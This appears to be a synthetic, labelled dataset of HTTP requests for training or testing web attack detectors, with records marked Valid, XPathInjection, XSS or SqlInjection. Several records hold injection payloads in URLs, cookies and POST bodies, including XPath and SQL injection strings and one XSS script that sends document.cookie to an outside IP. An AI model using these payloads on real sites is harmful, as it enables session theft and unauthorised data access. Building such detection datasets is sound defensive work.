Accept-Charset: *
Accept-Encoding: deflate;q=0.6
Accept-Language: *
Cache-Control: no-transform
Client-ip: 203.26.52.204
Cookie: 6pee=r>x2lr'Hnmeta;cEwO16T=8no lo-q   @t;srehs=tf;mW.Id=j
Cookie2: $Version="741"
Date: Wed, 09 Nov 05 14:12:52 CET
ETag: "eiDN7Tz@qZy.F3MgZQ"
Expect: 0nsepEe=Ea7Q3
From: naaufvp@rOayez.uk
If-Modified-Since: Fri, 23 Dec 05 21:49:04 UTC
If-Unmodified-Since: Wed, 27 Jun 07 10:39:21 UTC
If-Match: *
If-None-Match: "EHcXEA8nKFpkEv3opt"
If-Range: *
Max-Forwards: 2986
MIME-Version: 7.8
Pragma: no-cache
Proxy-Authorization: NTLM bmVoc3llZXdpRXJ0OWtibXdpNXlyZGRpcml3cGxtcnBzZ2FpcW1qNHRF
Authorization: ahtwme 2fda=jhaaQ
Range: -1909,0060-494,6-
Referer: http://iorit.be/Xtoid9.avi
TE: trailers,chunked;q=0.3,trailers
Trailer: Host
User-Agent: oEJ9VIwXFw http://www.p7mrtna.ch
UA-CPU: StrongARM
UA-Disp: 9734,8535,8
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 5187x1770
Via: neeetu/3.1 www.Ngilzh.shtml, 7.9 www.omvdb.js
Transfer-Encoding: gzip
Upgrade: L5mEt/8.6, onmhis/9.1, yacc0v/3.3
Warning: 600 www.rong.jpeg "ecdetwej" "Mon, 19 May 08 07:00:07 UTC"
X-Forwarded-For: 106.231.90.123
X-Serial-Number: 1807971586692
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 25932
Start - Id: 13691
class: Valid
GET /Loaipuet/jperlqyF/supV_/JcRhywindow.openm.swf?joowhiMlx3ar=4&oes5duMXRs=ieaxts%7Econnect5ia&teEhiolipec=71405&sao0oAM=4e.LWYb%40c6xV&sbw9Bstlip6ai=aB1MGeasLm&umtaiaa7e=bhY.gx7f&tFc2=taea+xtuxemd%3Emo&Kscripthttpsecho=hqpsuS&iducqWa=44352&sxENtfoe2=eixRdLN3 HTTP/1.1
Host: www.nesnhaUi.fr:80
Connection: keep-alive
Accept: application/*;q=0.5
Accept-Charset: *;q=0.6
Accept-Encoding: *;q=0.5
Accept-Language: 45aeHy-o;q=0.7, oibdhI-qAxtt, 2isg4-tt0e;q=0.2, 3auibCeO-wja9, eynsa-ly0e
Cache-Control: max-stale
Client-ip: 225.55.25.65
Cookie: tuthatrpTshr=LLl-oOeln;gi0lifeete=N ;sps=01485;Loatlmc='oio;veVDf3Iv8GSN=6777707;8n=einsertoW6yaechoreHea1Ttt ae
Cookie2: $Version="554"
Date: Sat, 21 Jun 08 22:15:22 CET
ETag: W/"duJrOp5ympvV0V_HtiaU"
Expect: 100-continue
From: s29eksF@wcAom7est.fr
If-Modified-Since: Fri, 31 Oct 08 23:51:55 GMT
If-Unmodified-Since: Tue, 27 Apr 10 05:04:26 CET
If-Match: "0C@sDPr46CvsMa9uDzh_"
If-None-Match: *
If-Range: Wed, 25 Jun 08 09:07:15 UTC
Max-Forwards: 5
MIME-Version: 4.7
Pragma: eregs='tsoan'
Proxy-Authorization: Basic c251dXl0OmdoempzdQ==
Authorization: itaAt ua0ako=mdfeoah
Range: -922184,573-
Referer: /md2neRsI/ttcherm/niheee/rsdwraet.png
TE: trailers,trailers,trailers
Trailer: Authorization
User-Agent: r8glfJ http://www.txMstesr.de
UA-CPU: Sparc
UA-Disp: 146,6247,32
UA-OS: Linux
UA-Color: color16
UA-Pixels: 757x935
Via: 3.1 93.246.85.194:2596
Transfer-Encoding: gzip
Upgrade: ztst8/6.0, emn/7.0, die/9.5
Warning: 757 36.29.209.66 "rvr2" 
X-Forwarded-For: 215.154.230.233
X-Serial-Number: 1852790108043394492
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 13691
Start - Id: 35792
class: XPathInjection
GET /5yMQiXY4xVRMEnux/micjouhecHifrccyw/1neecat9ido6ewoa.dll?dxTttdrAoaoh=4730&dnwga0vij5r0t=4&connectiexecwgetuepsT=47410&gaTjtceeiu=42++++or+++1%3C+++ooap%2FdLsat%2Foyryjp%2Fchild%3A%3Atext%28%29%5Bposition%28%29%3D227%5D+or+++53784%3D%27%5D+%7C+%2F*+%7C+%2Ffoo%5Bbar%3D%27&eiereyr=146110&bpgosewhono=ic+&uVkm8iMcjOB=%2FrHkQuD%25etsiE&erpi228uhe=%7Cibtsaexec0Hainput&rd=ie%29&aqutdts6si=aa%7Etfsee%25ls&tE=516146&lhxecdt=gSttcgTsrtuEnit0rs&rdivraslc=37293462 HTTP/1.0
Host: www.Eo5inlh.ch:7
Connection: keep-alive
Accept: */*;q=0.7
Accept-Charset: *
Accept-Encoding: *;q=0.1
Accept-Language: eple-s;q=0.5
Cache-Control: only-if-cached
Client-ip: 111.27.1.64
Cookie: 4ZaaQ=33577516;uellh=Ie~
Cookie2: $Version="6"
Date: Mon, 12 Jan 04 18:19:45 UTC
ETag: "BC6ce8C_dnKt4s0Z."
Expect: eenre=cursi6
If-Modified-Since: Sun, 24 Jan 10 17:33:25 CET
If-Unmodified-Since: Sun, 08 Jan 06 10:17:12 UTC
If-Match: *
If-None-Match: "goCA50TMcEZSq9GDjJAr"
If-Range: "TD6isthNtm7jY26y"
Max-Forwards: 27
MIME-Version: 1.8
Pragma: no-cache
Proxy-Authorization: luLc Okt8e=3llo
Authorization: Digest username="eahAd"
Referer: http://www.nle7.org/gre2/htftid.jpg
TE: chunked,trailers,trailers
Trailer: Expect
User-Agent: Mozilla/6.0 (Machintosh; U; PPC Mac OS X 9.9; l8-ov; rv:4.7.4) Gecko/03793926
UA-OS: WinNT
UA-Pixels: 4135x5853
Via: 1bNUer/1.3 245.161.192.158, 8.2 www.dolma.gif, ual/3.0 6.114.3.31
Transfer-Encoding: compress
Upgrade: n2smtz/0.7
Warning: 396 72.31.252.105:54837 "8rfz" "Tue, 15 Dec 09 08:04:48 UTC"
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35792
Start - Id: 48446
class: XPathInjection
GET /zK_FF603/lcTxwwvGEYv9hFE@/ctlrh4zeoaei/lL7QuIE9yC/xj5AGZG.jsp?6nlSnredn=081010 HTTP/1.0
Host: 238.2.58.147:38662
Connection: keep-alive
Accept: application/*;q=0.5, audio/*;q=0.9, video/mpeg
Accept-Charset: *;q=0.7
Accept-Encoding: 
Accept-Language: *;q=0.1
Cache-Control: only-if-cached
Client-ip: 217.161.106.238
Cookie: ceTAfjservicespm1SN=Db'   or  path/child::node()[position()=N]   or     'c5a'  ='
Cookie2: $Version="085"
Date: Tue, 04 Mar 08 02:58:22 CET
ETag: "wD11v2K1vjaq.FUAN.l"
Expect: aaim
From: sSemrt@seimn8nif4.com
If-Modified-Since: Sun, 24 Sep 06 06:21:57 UTC
If-Unmodified-Since: Thu, 21 Aug 08 03:41:35 UTC
If-Match: *
If-None-Match: *
If-Range: Fri, 12 Mar 04 15:39:47 CET
Max-Forwards: 46
MIME-Version: 9.5
Pragma: ss=hodcd5sz
Proxy-Authorization: NTLM MkxZYW80ZWhlb2xodWl0YW9pc29wMXNBb2x0M29udGVub1IwbmhoRVZhc2Zld2M=
Authorization: 7se2m intoj5tr=nkeente
Range: 195-,31437-
Referer: http://BwOdaeG.fr/rnnys/geeeoe/rhep0.msf
TE: trailers,trailers
Trailer: Pragma
User-Agent: Mozilla/9.9 (Machintosh; U; PPC Mac OS X 0.6; og-ur; rv:4.9.4) Gecko/19843493
UA-Disp: 5178,273,32
UA-OS: Win95
UA-Color: color8
UA-Pixels: 348x583
Via: 8.5 61.142.72.91:0195
Transfer-Encoding: amyth; euna=nbfntg
Upgrade: rtyfAi/5.9
Warning: 787 www.nspetr.htm "homtzfS" 
X-Forwarded-For: 152.33.64.46
X-Serial-Number: 30614
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48446
Start - Id: 47341
class: XSS
GET /FAF.nph-htacceslQDH/t-iokYxmlpQPXLKAH/tiPBdt8.telnet/CVzP2XB/tnnvtaurtdrto/nk9VgqwidssG/oPzOtNhPznk/iBRp.html?mFltX15EPGVf=http%5Drer&stsAh0wueue=%26%3Cscript+%3E%5Bwindow.open%28%27http%3A%2F%2F194.93.148.104%2Fan.cfm%27%2Bdocument.cookie%29%3B%5D%3C%2Fscript+%3E&caoiuidnctgiC=twp-ys&4eronsiiE=844253 HTTP/1.0
Host: www.l6enIa.net
Connection: close
Accept: application/rtf
Accept-Charset: *
Accept-Encoding: *;q=0.9
Accept-Language: *
Cache-Control: f38ahCga='0ehhnls'
Client-ip: 88.199.53.236
Cookie: fzsoueeig3OA=oiars;tsin=a.4TX;ejpassthruI5_3@46l=c6ESl8dSeiNw;Tadhosnn2i=h4hanrrevdrCem;c0TpeunA= peoe
Cookie2: $Version="38"
Date: Sat, 28 Feb 04 09:48:50 GMT
ETag: W/"@ohBoT1s.JGyaGLB2"
Expect: 100-continue
From: iipt@ooal.biz
If-Modified-Since: Tue, 26 Feb 08 16:15:32 GMT
If-Unmodified-Since: Sun, 22 Oct 06 10:22:05 CET
If-Match: "4SUILGc06mQVxz@"
If-None-Match: "w7A9T6gUm2Ety7U0vHla"
If-Range: Sun, 17 May 09 10:57:49 UTC
Max-Forwards: 2956
MIME-Version: 1.3
Pragma: no-cache
Proxy-Authorization: Digest cnonce="izenb6"
Authorization: Digest algorithm=MD5
Range: -066761,152-
Referer: http://www.lKlT.cz/qiwcco/epertUec/styo.asp
TE: trailers,trailers,deflate
Trailer: If-Match
User-Agent: Mozilla/3.2 (X11; U; Linux i586 0.4; ri-bd; rv:1.1.1) Gecko/30963685
UA-CPU: MIPS
UA-Disp: 699,6656,8
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 575x5791
Via: FTP/5.9 176.31.159.123:6
Transfer-Encoding: identity
Upgrade: eoea/3.2, whp5n/5.7, nto/1.7, nsa/0.9
Warning: 030 32.43.121.212 "zsmp" 
X-Forwarded-For: 216.123.220.178
X-Serial-Number: 0450626600564347
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47341
Start - Id: 32487
class: Valid
GET /GH7/rrovarreoaozqwtao/n.HKYOS3Ra29nc8QTn/eNUJcZr/VnullS_2J8/saecar5osIulhj3.bin?nR4ethssnmimnet=al&VkAolet7idn=wuysSaovtUl&pGwecmr=dlseslIscMegat7&otretEsjyCy=0856596&2daeasnS4orldu=rpAYAH2M%40a3&elteiAogoceb=UEMonTc&cdSu1yAW=5&oniei9sse=495138&eooo=agwhrgawodptent&aeei=94&u3pglel6miiion=74904 HTTP/1.0
Host: 24.152.230.72:80
Connection: close
Accept: */*;q=0.6
Accept-Charset: *
Accept-Encoding: gzip;q=0.8, compress, deflate, gzip;q=0.6
Accept-Language: hieji-si;q=0.9, 0di-eate;q=0.5, t7-twesl, EdeneTi-sHretddT;q=0.3
Cache-Control: max-age=79
Client-ip: 73.241.163.39
Cookie: ae9erasnOyuaf=aaG) tttie;oaaoK2n1selo=333804914;hsmia=955
Cookie2: $Version="5"
Date: Sun, 11 Feb 07 11:28:27 UTC
ETag: "ld8Bp9My.mrVep5H0h"
Expect: 9aiMn
From: scowa@lgoehnG.com
If-Modified-Since: Mon, 19 Dec 05 18:14:54 CET
If-Unmodified-Since: Mon, 03 Sep 07 17:18:16 UTC
If-Match: "9hY8QWoEiU3t0ds6mq"
If-None-Match: "uGR@ncgFdFodS-zAYB1"
If-Range: Sun, 02 Sep 07 03:41:01 GMT
Max-Forwards: 00
MIME-Version: 7.2
Pragma: es='bssr'
Proxy-Authorization: Digest nc=7E1c1459
Authorization: ssug jhtae=lecu67
Range: 058649-044,-353064,-571504
Referer: /ipeyemq/2s9n/mlpi/cssih/nbsnuty.fgf
TE: trailers,trailers
Trailer: Date
User-Agent: Mozilla/8.1 (X11; U; Open BSD i386 7.4; vs-x2; rv:0.8.5) Gecko/64169693
UA-CPU: x86
UA-Disp: 050,1094,32
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 630x705
Via: See/0.3 www.uklwsiw.gif, 4.7 86.102.195.93:3369
Transfer-Encoding: compress
Upgrade: ottr8/8.0, iwmS/1.0, oey/2.0, rief/2.4
Warning: 993 www.tenyR.gif:13 "mamteap" 
X-Forwarded-For: 236.106.207.155
X-Serial-Number: 31593732
----: --------------------
~~~~~: ~~~~~~~~~~

null

End - Id: 32487
Start - Id: 14841
class: Valid
GET /2xE.bEgBID.36/eMpee1Kt2PvlgM/nnussnelodinvh6/ds/eEkR@-Tw@kM/PE.gYssBNNz/bhos/xDkyOtiy@59/8DwpasswdHnD/e0d2w9sew/u7ersRgehtrulmm7f/uoW-wy_.jpg? HTTP/1.0
Host: www.emiLogzpyf.de
Connection: close
Accept: */*;q=0.3
Accept-Charset: euc-jp;q=0.1, windows-1251;q=0.5, windows-874
Accept-Encoding: gzip;q=0.2, deflate;q=0.3, deflate;q=0.9, compress;q=0.7
Accept-Language: ad3-igu, neoO-dqperohh;q=0.1, cnfFnsr-ps;q=0.9
Cache-Control: no-store
Client-ip: 132.135.71.178
Cookie: cth9r=neead9eRatg;qreee=811729837;ioutgftCttho=e7dc3?)eopt
Cookie2: $Version="33"
Date: Sat, 31 Jul 04 04:14:59 CET
ETag: W/"u5dpFfw9Dg3Eld0ytRo"
Expect: minii
From: se5tmG@5hndem.ch
If-Modified-Since: Sun, 14 Mar 10 11:00:56 UTC
If-Unmodified-Since: Thu, 28 Jun 07 18:47:11 GMT
If-Match: *
If-None-Match: *
If-Range: "ar-36AbNgQ.81JmKt-"
Max-Forwards: 090
MIME-Version: 2.8
Pragma: tutae=sstina
Proxy-Authorization: Basic cWVhYzp3ZHJOdGFrZQ==
Authorization: NTLM aWRIb3lhczlvc3Njc2hsc2VmZnJNZ2JpenRzNGVMc2F2aTJF
Range: 974110-
Referer: /badordni/Ytnj/aE2o.css
TE: trailers
Trailer: Host
User-Agent: o1atoranao/2.0.4
UA-CPU: 68000
UA-Disp: 6293,3551,8
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 923x8805
Via: 0.8 www.oig2.gif:8145, rdi/5.0 143.56.193.24:208
Transfer-Encoding: deflate
Upgrade: altl/2.2
Warning: 396 135.99.201.170 "ensfieereprG" 
X-Forwarded-For: 175.103.200.117
X-Serial-Number: 89813
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 14841
Start - Id: 35593
class: XPathInjection
GET /_hDQpTzhoVSXB/Ds1w.processing-instructionv.aspx?sgon=aros%2Faqih%2Fy%2Fchild%3A%3Anode%28%29%5B++position%28%29%3D09%5D+%7C+++++teL%2Fai%2FeH78c%2Fchild%3A%3Atext%28%29%5Bposition%28%29%3D3%5D++or+++%27rse4gsnq%27++++%3D++%27&lEv6uooet=1yw3TJ2C&ssawe9c83he5ru=eodr0dti+e&lrd3Xoasgg1denn=irv%5ClrdTcx2cs4SD&linkDRiDwget1bin=neeih&scywt7uza2otd=nohiess0ah&Cmcdld7e4ap=%3Cf&kVVz7@H=qhlxml&Ok5udoimdeqqp=dgI3%40K9bpt8&ltEh=s8mao&tesufyeb=+form8p&rilhrEv=oh%40 HTTP/1.0
Host: 211.167.113.195
Connection: ineos
Accept: */*;q=0.3
Accept-Charset: *;q=0.7
Accept-Encoding: *;q=0.5
Accept-Language: *;q=0.2
Cache-Control: min-fresh=47502
Client-ip: 158.47.155.211
Cookie: oreeinzeto4r8e=eoytn;gthmeep=ptdsId;triSOciurzkett=o-OJqtDGNqA;nhuqx=0;9rteazee=tf-J.i5fA;uvVqmc=Ose
Cookie2: $Version="931"
Date: Fri, 18 Jun 04 06:10:55 GMT
ETag: W/"7umuTM27UJFVw2-bKB"
Expect: atlide=oHonl
From: keef8S@qicoiNe.be
If-Modified-Since: Sat, 24 Jun 06 20:37:15 UTC
If-Unmodified-Since: Thu, 07 Sep 06 09:30:37 CET
If-Match: "ShnD2NkYPCwI-Pnxb"
If-None-Match: "rwOo.Tuonx4ayEEa"
If-Range: "yVtkiY1Seq-Clxsib"
Max-Forwards: 44
MIME-Version: 4.7
Pragma: o='aeU'
Proxy-Authorization: NTLM b2RXcmx2M25sdGE2b3dvcmVIaGxuZWh5b2lzdGlXWGRvdnlvUm0xZXQxbU8zYm0=
Authorization: Digest algorithm=MD5-sess
Range: 1278-6
Referer: /d7Koshs.conf
TE: trailers,trailers,chunked
Trailer: Warning
User-Agent: Mozilla/0.0 (compatible; Konqueror/5.1; Mac OS X; ftrdclcdei; tbss4rRAe)
UA-CPU: 68000
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 138x439
Via: 6.9 www.pa3eVo.css, nrop4/9.3 www.aeas.gif:883, 1.7 www.yfewB.jpeg
Transfer-Encoding: compress
Upgrade: anfbe/0.9, m2ntt/2.0
Warning: 204 197.17.40.24 "eS4aShneveaeoeqAni" "Sun, 06 Nov 05 19:18:19 CET"
X-Forwarded-For: 245.111.237.199
X-Serial-Number: 65275952070459353
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 35593
Start - Id: 41968
class: SqlInjection
GET /riiEm@R4oN/Z4selectI-Wi/19processing-instructionFS/gasLfr/t@cKqC7WIv54ZUWOmR.jpg?tosMoieorn9hNd9=or+++++0%3C%3E%28select++++count%28*%29+++from+++wniIf%29&EuOSU.wGA=365&ahbnckrh6ddaRse=49408&Q-Y6execq=285&yanzeqtp=%28%5B9o&htbi72tdi5i=a%3Byut%2Flbetweents6e HTTP/1.0
Host: 92.238.168.162
Connection: eiedE3
Accept: image/png;q=0.7, audio/x-wav, text/html
Accept-Charset: *
Accept-Encoding: *;q=0.9
Accept-Language: Jti-net;q=0.9, pd-Nmptoia, r1n9en8a-a;q=0.0
Cache-Control: only-if-cached
Client-ip: 102.180.54.45
Cookie: e8=1265060264;eeuwoa=edDNL
Cookie2: $Version="717"
Date: Thu, 25 Jun 09 13:52:10 CET
ETag: "sVe4cTNh_tT9Of5"
Expect: 100-continue
From: 4zD9@jt6etwau5.be
If-Modified-Since: Mon, 15 Jan 07 20:24:15 UTC
If-Unmodified-Since: Mon, 03 May 10 20:05:42 GMT
If-Match: *
If-None-Match: "O1w-Jsqx72emG7d4wbl"
If-Range: Sat, 25 Sep 04 13:40:58 GMT
Max-Forwards: 75
MIME-Version: 0.8
Pragma: no-cache
Proxy-Authorization: Digest nonce
Authorization: Basic V2VibzppeXRRYmJo
Range: 991-40833,238399-36
Referer: http://www.Daxstd.net/Tidsah/erirsIf6/oRwd.cfm
TE: deflate,gzip;q=0.9,trailers
Trailer: Proxy-Authorization
User-Agent: Mozilla/5.7 (Windows; U; Win98 6.8; mn-un; rv:4.1.7) Gecko/91720625
UA-CPU: MIPS
UA-Disp: 4298,556,32
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 329x4778
Via: seQnm/8.6 81.43.123.224, HTTP/9.0 www.n2esy.tiff:2710
Transfer-Encoding: identity
Upgrade: osgosN/1.6, nzpps/5.5, rhoft/4.2, feo/7.7, htler/3.3
Warning: 494 42.216.10.168:95428 "esi7pe3nyrrtei" "Wed, 28 Apr 10 16:07:09 UTC"
X-Forwarded-For: 88.3.128.18
X-Serial-Number: 41242078999326437
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41968
Start - Id: 10970
class: Valid
GET /596hhLzThq5/Z8COBGEtrmkKn/uRfn/shtsstbde/abillfatntasi/9-cDnDvDKaE/962asOtetsebtRntn/lBgDPp51Hfzb4I4O.E.jpeg?msluir=l9&oaeeelGlajen=1300368&oinrlishe0eiue=72&eieai7prnanelss=bAs%298omo&hpaet=eireplaceNeguloga&nte8hl5ea=mK6xEl_6&H@HvbTrBRsock_streamBa=ptyti HTTP/1.1
Host: 99.215.215.172
Connection: close
Accept: */*
Accept-Charset: windows-1255, cp-950;q=0.3, hz-gb-2312, iso-8859-9, x-mac-japanese;q=0.6
Accept-Encoding: *;q=0.1
Accept-Language: lirTooh-l4ocEe;q=0.3, M-iP, 1t1ahutW-eeeiee, pai-nrin, tt9da-ets
Cache-Control: min-fresh=3
Client-ip: 39.130.100.11
Cookie: oNt=e<oat4insertRu;ipkeGgHsarEsa=bGusocadmot7HeceDt;3hzDr@A=9819
Cookie2: $Version="75"
Date: Sat, 27 Jun 09 01:07:30 GMT
ETag: "s6P-7dH5qnd_FGuXy5zE"
Expect: 100-continue
From: nEthao@lF0rnyg.ch
If-Modified-Since: Sun, 18 Nov 07 13:22:17 CET
If-Unmodified-Since: Sat, 06 Sep 08 06:26:43 GMT
If-Match: *
If-None-Match: "6mB0gjGcBLDr@qn@oE4m"
If-Range: "Brhm.t6ErEtNc_L"
Max-Forwards: 813
MIME-Version: 9.3
Pragma: yty=doo
Proxy-Authorization: NTLM aHQzbnNvZTNyamVjZWRhYXRzRnRhZ2hscDRwNXEzaDZrYWFuaml1MXI=
Authorization: odl9 lzmbixs=srsaeem
Range: 459-,-939336,-414577
Referer: /v3etwrS/t1rP/ttesy/sr7n/kuftgedL.jsp
TE: gzip,trailers
Trailer: Trailer
User-Agent: Mozilla/3.4 (compatible; MSIE 1.7; Open BSD i386; or1jeickbr)
UA-CPU: Sparc
UA-Disp: 487,6380,16
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 0977x0874
Via: FTP/5.2 156.30.96.57, e1i/4.3 89.127.193.203:4, HTTP/8.8 252.231.204.56:49
Transfer-Encoding: gzip
Upgrade: sgsic/5.6, ntlan/7.1, 6jase/6.4
Warning: 455 www.jeonsr.htm "easchrhbeywpmR3" 
X-Forwarded-For: 237.166.249.162
X-Serial-Number: 17087592
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 10970
Start - Id: 33635
class: Valid
PUT /Wy1i/osd-tbodypuFgeGZD/leaqieii/e1JOo@/o3vt5tiorgbr8rae/r4ty-X/it5/egaljvtnagro.asmx? HTTP/1.1
Content-Length: 303
Content-Language: 1u
Content-Encoding: gzip
Content-Location: /rcoq2op.jsp
Content-MD5: ZHV0Wmx1aWlzbmF5NnJtYw==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 02 Jun 08 03:10:13 GMT
Last-Modified: Sun, 30 Nov 08 22:32:55 GMT
Host: 250.111.129.8
Connection: close
Accept: text/*;q=0.9
Accept-Charset: *;q=0.0
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-stale=2
Client-ip: 75.116.126.71
Cookie: YchomeRiWobject4BREk=788;ocmtitcE=dc;chj1Si=ttoboot.inis+fecbetweenetmailvsx;wviw6=tloerah;eat=aehi
Cookie2: $Version="81"
Date: Wed, 03 Mar 04 11:03:25 CET
ETag: "kmSUcPJ2-I1qWCt"
Expect: 100-continue
From: sorto@ieishbt.net
If-Modified-Since: Fri, 27 Jun 08 15:36:31 GMT
If-Unmodified-Since: Thu, 21 Jun 07 24:50:31 GMT
If-Match: *
If-None-Match: "GdIXFknONzB6U3bKh5x"
If-Range: *
Max-Forwards: 845
MIME-Version: 5.5
Pragma: aodi=n2e3
Proxy-Authorization: Basic c242bzp1aHNydHV5
Authorization: NTLM dGRpZUV0ZHNFcmZtZWlpbmduZWQzb25vYmRlY2Ric2pvY2Zwc294ckFjcGllaA==
Range: 689688-61042,8281-8,59457-
Referer: /smsnrhd/hyf7n96g.fgf
TE: chunked
Trailer: If-Match
User-Agent: Mozilla/6.7 (Machintosh; U; PPC 9.6; pi-i6; rv:1.4.8) Gecko/24099712
UA-CPU: PowerPC
UA-Disp: 2341,003,16
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 298x670
Via: FTP/1.6 www.yine.css
Transfer-Encoding: compress
Upgrade: gtna/7.9, sn70/6.7
Warning: 498 www.xaotiar.jpg "eukeq6fnna" 
X-Forwarded-For: 246.11.40.158
X-Serial-Number: 0416121042278331
----: ------------
~~~~~: ~~~~~~~~~~~~~~~

jMSmS=Aty-mtn&9KrNV-ae=btWM_fA6YP&9aj2eoi3ASwcs=mPO&c3tctto9ejmhodt=530542&rtcniloiamHx0u=Pr<htpasswfro&HvdocumentfrmetaJK-=830290&GlogBstSvdropBqIB=libleetgsis&etoa9hdleoo=664980963&IgT9Ilhttps-TWX=079401&ea=5j8rottsv&i8MWLherm=tIe6Fl2uo2&p2BYCscriptUxtermN=http< $J&rSdehe=eor1dze&yw=u86iuL8NVJY

End - Id: 33635
Start - Id: 9515
class: Valid
GET /t8c@/toaxBIipGC/i6hCg9vpJ7TOsh4RG/eMNS-9qdQ6h/mesr/ietdhoitt/aedh7essm.jpg?se=na9oOvwu&nr8nariwco=eet2kewrh++ual%5D%3Bif&uenusfrcady3jh=8110909 HTTP/1.1
Host: www.n9rDted.st
Connection: close
Accept: video/*;q=0.3, text/*;q=0.2
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-transform
Client-ip: 193.54.140.120
Cookie: Enmdiayl0e=ede@
Cookie2: $Version="2"
Date: Tue, 07 Oct 08 08:44:18 UTC
ETag: "l3@N7vATzXIQJKXpkJ6X"
Expect: 100-continue
From: i2nofe@soetse.biz
If-Modified-Since: Sun, 17 Jul 05 12:03:08 CET
If-Unmodified-Since: Thu, 24 Nov 05 14:10:10 UTC
If-Match: "sPf_PRU8kAGNbTxD.W"
If-None-Match: *
If-Range: *
Max-Forwards: 365
MIME-Version: 3.0
Pragma: dEybhc=Ndjgi3
Proxy-Authorization: UraeR rlDgih=Tobabi
Authorization: Digest uri=http://yiobit.org/tktcEkoi.pl
Range: 870431-,61-,-3837
Referer: http://www.narfd.be/h4tt/ojleo2rt/4ooEe.cgi
TE: trailers
Trailer: Connection
User-Agent: Mozilla/9.6 (X11; U; Linux i386 4.1; iH-le; rv:4.7.8) Gecko/80899460
UA-CPU: 68000
UA-Disp: 389,574,16
UA-OS: Win98
UA-Color: color16
UA-Pixels: 279x7075
Via: 1.7 197.147.174.96, HTTP/4.0 88.1.29.168
Transfer-Encoding: compress
Upgrade: otezgo/5.3, je5ts/2.9, egwO/2.1
Warning: 724 1.186.0.197:4 "pvtse" 
X-Forwarded-For: 140.234.18.98
X-Serial-Number: 2426894
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 9515
Start - Id: 48527
class: XPathInjection
POST /phipcoorn7wcgcrli/CqmT0x/uenwsEhmetA/Itla7Tono9fasRsse3s/fsepsOesewaamndeit/eK4Yd/nkA-AaAmlU6mQ5U3Y/0dedctcia.png? HTTP/1.0
Content-Length: 212
Content-Language: c
Content-Encoding: gzip
Content-Location: http://www.riagMd.com/Nocfp.js
Content-MD5: b2NocXRlYmg1dWhlMXN5aA==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 27 May 05 17:36:13 CET
Last-Modified: Thu, 20 Jan 05 18:36:12 GMT
Host: 64.217.7.145:80
Connection: keep-alive
Accept: */*;q=0.3
Accept-Charset: us-ascii, ks_c_5601-1987, windows-1255;q=0.7
Accept-Encoding: identity;q=0.1, identity;q=0.5, identity
Accept-Language: nnvBtx-mteh8f, lmfh7ew-eo
Cache-Control: max-age=540
Client-ip: 210.55.17.62
Cookie: lwer7kot=triperlefoeecy2rmzlrn
Cookie2: $Version="5"
Date: Sun, 26 Nov 06 13:31:42 GMT
ETag: W/"DH_rMCDx8@tWH@v-"
Expect: 100-continue
From: hpeced@ekqiej.it
If-Modified-Since: Fri, 03 Mar 06 20:33:26 GMT
If-Unmodified-Since: Thu, 14 Apr 05 11:42:10 UTC
If-Match: *
If-None-Match: *
If-Range: Sun, 03 Jun 07 13:56:17 CET
Max-Forwards: 652
MIME-Version: 9.6
Pragma: aScsv='Tha8eBn'
Proxy-Authorization: mtlwdi eSfIe=ftEqwcOT
Authorization: mtoht Tturpk=eefhirah
Range: 51-93,35-2637,65821-
Referer: /xteeor.php
TE: trailers,chunked,chunked
Trailer: Max-Forwards
User-Agent: e@SWYqma http://www.y3en.be
UA-CPU: x86
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 7707x473
Via: FTP/6.9 www.rl22ie.jpeg
Transfer-Encoding: gzip
Warning: 437 242.254.172.181 "wwyyel6" "Tue, 23 Aug 05 14:58:53 GMT"
X-Forwarded-For: 104.189.251.216
X-Serial-Number: 7572286452988
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

h6inenoe=trSB&QaSereplaceX8WWuC=eelteisilE&eraVdS=81176  or  0enenn/c/r/child::node()[position()=64]   or    33456=&Mm33Xconnect0p=5eaeoy3ycow&ayeuuxAedh=eo&YKIFYahrs=serviceshqf6&0ssV=2

End - Id: 48527
Start - Id: 10799
class: Valid
GET /j6d/dVJki/ouvVyVV/st7vwpnEpodgaroenYe.dll?enoo8=teval&nmophiuo=3s+p HTTP/1.1
Host: www.smhoTp2sne.ch:74
Connection: keep-alive
Accept: */*;q=0.2
Accept-Charset: *
Accept-Encoding: compress;q=0.1, gzip;q=0.3, identity;q=0.2, compress;q=0.6
Accept-Language: *;q=0.0
Cache-Control: max-stale
Client-ip: 25.225.101.88
Cookie: DWae=4O@Sl;L0YIsZtdX5=omb;rpt8d=87407
Cookie2: $Version="9"
Date: Sat, 06 May 06 16:19:54 CET
ETag: "fNmsx9usxqQx6nMj2L4"
Expect: edeosGeb
From: etraE@esntn6w.fr
If-Modified-Since: Wed, 05 Jan 05 17:34:13 UTC
If-Unmodified-Since: Sun, 18 Oct 09 12:33:06 GMT
If-Match: *
If-None-Match: "6B5AZ.GfuRjsDNKXzXv"
